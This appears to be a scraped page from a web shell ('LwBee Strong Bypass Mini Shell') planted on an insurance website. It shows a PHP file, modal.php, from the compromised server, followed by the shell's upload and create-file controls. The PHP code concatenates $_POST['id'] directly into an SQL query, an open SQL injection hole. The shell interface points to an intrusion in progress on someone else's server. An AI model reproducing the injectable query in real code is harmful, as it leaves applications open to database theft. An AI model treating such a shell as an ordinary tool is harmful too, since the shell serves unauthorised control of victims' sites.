/home3/vehiclea/public_html/keerthiinsurance/modal.php
<?php
  include('include/include.php');
  if(!empty($_POST['id']))
  
  {
    
      $select = executework("select * from portfolio where id ='".$_POST['id']."'");
      $row = mysqli_fetch_array($select);
      echo $row['name'];
  }
?>
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File